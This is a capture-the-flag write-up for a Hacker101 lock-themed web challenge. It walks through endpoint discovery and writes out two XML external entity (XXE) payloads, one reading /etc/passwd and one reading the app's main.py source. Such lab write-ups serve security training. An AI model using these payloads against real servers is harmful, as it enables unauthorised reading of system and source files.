Hacker101 CTF Writeup

View on GitHub

Model E1337 - Rolling Code Lock - FLAG0

0x00 Home

Tried couple of different code but all show errors.

Code incorrect. Expected 06947342

0x01 Directory

Try scan sub directory with Burp

And there is a comment in source code.

0x02 get-config

Looks like some config thing using XML

0x03 set-config

It actually exist but may need parameter to set the XML

0x04 XXE

Prepare the XXE payload.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "/etc/passwd">]><config><location>&xxe;</location></config>

And encode to url format


Successfully write in XXE and 302 redirect to admin page and read out /etc/passwd

0x05 main.py

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "main.py">]><config><location>&xxe;</location></config>

Execute and get the FLAG in the main.py